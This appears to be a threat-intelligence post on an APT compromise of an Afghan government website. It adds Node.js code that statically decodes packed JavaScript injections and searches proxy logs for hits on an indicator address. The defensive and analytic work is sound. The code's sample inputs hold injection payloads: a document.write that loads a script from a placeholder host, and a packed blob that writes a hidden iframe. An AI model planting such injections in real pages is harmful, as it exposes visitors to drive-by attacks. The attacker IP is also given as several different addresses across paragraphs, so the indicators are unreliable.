Afghan Government Compromise: Browser Beware
June 12, 2015
Second Round of Attacks
In the earlier instances the offending code was easy to identify: the attackers simply prepended document.write statements to the very top of the gop-script.js file, as shown below:
The next major difference is that the attackers made more of an effort to hide their activity, appending their code to the end of the file and running it through the Dean Edwards Packer with base-62 encoding. The packer replaces the words of a script with short tokens and leaves behind a small eval() stub that rebuilds the original at runtime, so the appended block reads as an opaque eval(function(p,a,c,k,e,d){...}) blob, which makes it harder to tell what the attackers have done just by reading the code. The image below shows the malicious code as it currently appears within the jquery-1.4.2.min.js file:
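As an added example (not Volexity's code and not taken from the compromised site), the following Node.js script triages a JavaScript file for both injection styles described above: a prepended document.write() call with a string-literal argument, and an appended Dean Edwards packer blob, which it decodes statically by rebuilding the packer's token table instead of running eval(). The two input files are constructed stand-ins; example.invalid and the paths inside them are placeholders, not the real injected URLs.

```javascript
'use strict';
// Added example (not Volexity's code): static triage of a tampered .js file.
// It recognises the two injection styles from the post, a prepended
// document.write() call and an appended Dean Edwards "packer" blob, and
// decodes the packed code without evaluating it.

// Base-62 digit alphabet produced by the packer's e() helper: 0-9, a-z, A-Z.
const ALPHABET = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';

// Mirror of the packer's e(c): index -> token, most significant digit first.
function encodeToken(n, base) {
  let s = '';
  do { s = ALPHABET[n % base] + s; n = Math.floor(n / base); } while (n > 0);
  return s;
}

// Every packer blob starts with this decoder stub...
const PACKER_SIG = 'eval(function(p,a,c,k,e,d)';
// ...and ends with its four arguments: payload, base, token count, keyword list.
const PACKER_ARGS = /\}\('((?:\\.|[^\\'])*)',(\d+),(\d+),'((?:\\.|[^\\'])*)'\.split\('\|'\),\d+,\{\}\)\)/g;

// The packer escapes \ and ' and folds newlines to \n inside the payload literal.
function unescapeLiteral(s) {
  return s.replace(/\\(.)/g, (_, c) => (c === 'n' ? '\n' : c));
}

// Rebuild the original source: replace every \w+ token whose keyword slot is
// non-empty (an empty slot means the token stands for itself).
function unpack(payload, base, count, keywords) {
  const dict = new Map();
  for (let i = 0; i < count; i++) if (keywords[i]) dict.set(encodeToken(i, base), keywords[i]);
  return payload.replace(/\w+/g, (tok) => (dict.has(tok) ? dict.get(tok) : tok));
}

// Locate and decode every packer blob in a file; never calls eval().
function findPackedBlobs(source) {
  const found = [];
  PACKER_ARGS.lastIndex = 0;
  let m;
  while ((m = PACKER_ARGS.exec(source)) !== null) {
    const start = source.lastIndexOf(PACKER_SIG, m.index);
    if (start < 0) continue; // argument tail without the stub: not the packer
    const [, payload, base, count, words] = m;
    found.push({
      offset: start,
      base: Number(base),
      count: Number(count),
      source: unpack(unescapeLiteral(payload), Number(base), Number(count), words.split('|')),
    });
  }
  return found;
}

// document.write('...') with a single string-literal argument, as in round one.
const DOC_WRITE = /document\.write\s*\(\s*(['"])((?:\\.|(?!\1).)*)\1\s*\)/g;
function findDocumentWrites(source) {
  const writes = [];
  DOC_WRITE.lastIndex = 0;
  let m;
  while ((m = DOC_WRITE.exec(source)) !== null) {
    writes.push({ offset: m.index, argument: unescapeLiteral(m[2]), fromPacked: false });
  }
  return writes;
}

function extractUrls(text) {
  return text.match(/https?:\/\/[^\s'"<>]+/g) || [];
}

// One report per file: where the injections sit and which URLs they load.
function triageScript(source) {
  const blobs = findPackedBlobs(source);
  const writes = findDocumentWrites(source);
  for (const b of blobs) {
    for (const w of findDocumentWrites(b.source)) writes.push({ ...w, offset: b.offset, fromPacked: true });
  }
  const urls = new Set();
  for (const w of writes) for (const u of extractUrls(w.argument)) urls.add(u);
  for (const b of blobs) for (const u of extractUrls(b.source)) urls.add(u);
  return { packedBlobs: blobs.length, documentWrites: writes, urls: [...urls] };
}

// Constructed samples (not the real files); example.invalid is a reserved name.
// Round one: a document.write() prepended to an otherwise benign gop-script.js.
const SAMPLE_GOP_SCRIPT = [
  `document.write('<script src="http://example.invalid/inject.js"></script>');`,
  'function toggleMenu(id){var e=document.getElementById(id);e.style.display="none";}',
].join('\n');
// Round two: a base-62 packer blob appended to a stand-in for jquery-1.4.2.min.js;
// it decodes to a single document.write() that injects a hidden iframe.
const SAMPLE_JQUERY = [
  '/*! jQuery v1.4.2 */(function(A,w){function m(){}A.jQuery=A.$=m;})(window);',
  String.raw`eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('2.3(\'<1 4="5://6.7/8.9" a="0" b="0"></1>\');',62,12,'|iframe|document|write|src|http|example|invalid|x|html|width|height'.split('|'),0,{}))`,
].join('\n');

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(triageScript(SAMPLE_GOP_SCRIPT), null, 2));
  console.log(JSON.stringify(triageScript(SAMPLE_JQUERY), null, 2));
}
```

Run it with node; the packed sample decodes to a document.write() that drops a zero-sized iframe. Replacing tokens in a single pass over \w+ words gives the same result as the stub's own descending regex loop on well-formed packer output, and it never hands the attacker's code to the JavaScript engine. A document.write argument built by concatenation or from a variable would need a real parser rather than the regular expression used here.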
One of the more interesting tactics that APT attackers have employed in recent years is IP-address whitelisting. Volexity believes that the attackers behind the Afghan Government compromise likely have a specific set of targets that are the intended recipients of the malicious code served from the 18.104.22.168 address. In every instance observed so far, the server has answered only with HTTP 403 (Forbidden), which is the behaviour expected when the requesting address is not on the attackers' list. This threat group has used the same tactic on other websites involved in strategic web compromises in the past. The only real way to identify the targets is to observe the malicious code actually being served to a client, or to obtain the whitelist from the server itself. At this point we can only speculate that government and defense entities are the likely intended targets of this campaign. If you check your logs and find HTTP 200 results for this address, we would like to hear from you.
The most straightforward and primary network indicator at this time is communication with the IP address 22.214.171.124. ASN details from the Shadowserver IP-BGP service are shown below:
$ whois -h asn.shadowserver.org 'origin 126.96.36.199'
15830 | 188.8.131.52/19 | TELECITY | GB | linode.com | Linode LLC
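An added example, not part of the original post, of the log check the post asks for: it parses Squid native and Apache combined (forward-proxy style) log lines, keeps the requests whose URL host is the indicator address quoted above, and separates the 403s from any 200s, since a 200 identifies a client that the attackers' whitelist allowed through. The log lines are constructed (the two formats are mixed on purpose to exercise both parsers), the path /script.js and the client addresses are placeholders, and the indicator is a parameter so it can be changed if the address differs in your environment.

```javascript
'use strict';
// Added example (not Volexity's code): the "check your logs" step from the
// post, run over constructed proxy log lines. A 403 from the indicator means
// the requesting client was not on the attackers' whitelist; a 200 means it
// was served the payload and is a likely target that needs investigation.

// Indicator as quoted in the network-indicator paragraph of the post.
const INDICATOR_IP = '22.214.171.124';

// Squid native access.log: ts elapsed client action/status bytes method url ...
const SQUID_RE = /^(\d+\.\d+)\s+\d+\s+(\S+)\s+\S+\/(\d{3})\s+(\d+)\s+(\S+)\s+(\S+)/;
// Apache/nginx combined format, forward-proxy style (full URL in the request line).
const CLF_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) (\S+)/;

function parseLine(line) {
  let m = SQUID_RE.exec(line);
  if (m) return { ts: m[1], client: m[2], status: Number(m[3]), bytes: Number(m[4]), method: m[5], url: m[6] };
  m = CLF_RE.exec(line);
  if (m) return { ts: m[2], client: m[1], status: Number(m[5]), bytes: m[6] === '-' ? 0 : Number(m[6]), method: m[3], url: m[4] };
  return null; // unknown format: skipped rather than silently matched
}

// Match on the URL host, not on a substring of the line, so a referer or a
// peer field mentioning the address does not count as a request to it.
function hostOf(url) {
  try { return new URL(url).hostname; } catch (e) { return null; }
}

// Summarise every request to the indicator: counts per status code and the
// clients that received a 200 (the ones the attackers chose to serve).
function triageIndicator(logText, indicator = INDICATOR_IP) {
  const hits = [];
  for (const raw of logText.split('\n')) {
    const rec = parseLine(raw.trim());
    if (rec && hostOf(rec.url) === indicator) hits.push(rec);
  }
  const byStatus = {};
  for (const h of hits) byStatus[h.status] = (byStatus[h.status] || 0) + 1;
  const served = hits
    .filter((h) => h.status === 200)
    .map((h) => ({ client: h.client, ts: h.ts, url: h.url, bytes: h.bytes }));
  return { hits: hits.length, byStatus, served };
}

// Constructed log lines (not real traffic): 10.1.2.x are internal clients,
// /script.js is a placeholder path, 198.51.100.7 is a documentation address.
const SAMPLE_LOG = `
1434096000.101    95 10.1.2.3 TCP_MISS/403 366 GET http://22.214.171.124/script.js - HIER_DIRECT/22.214.171.124 text/html
1434096001.204    88 10.1.2.4 TCP_MISS/403 366 GET http://22.214.171.124/script.js - HIER_DIRECT/22.214.171.124 text/html
1434096005.550   210 10.1.2.9 TCP_MISS/200 1843 GET http://22.214.171.124/script.js - HIER_DIRECT/22.214.171.124 application/javascript
1434096007.002    40 10.1.2.3 TCP_MISS/200 5120 GET http://www.example.com/ - HIER_DIRECT/198.51.100.7 text/html
10.1.2.7 - - [12/Jun/2015:09:15:02 +0000] "GET http://22.214.171.124/script.js HTTP/1.1" 403 366 "-" "Mozilla/5.0"
`.trim();

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(triageIndicator(SAMPLE_LOG), null, 2));
}
```

On the sample this reports four requests to the indicator, three answered 403 and one answered 200; the client behind the 200 is the host to pull for forensic review, and the 403 clients tell you which of your own address ranges the attackers were not interested in.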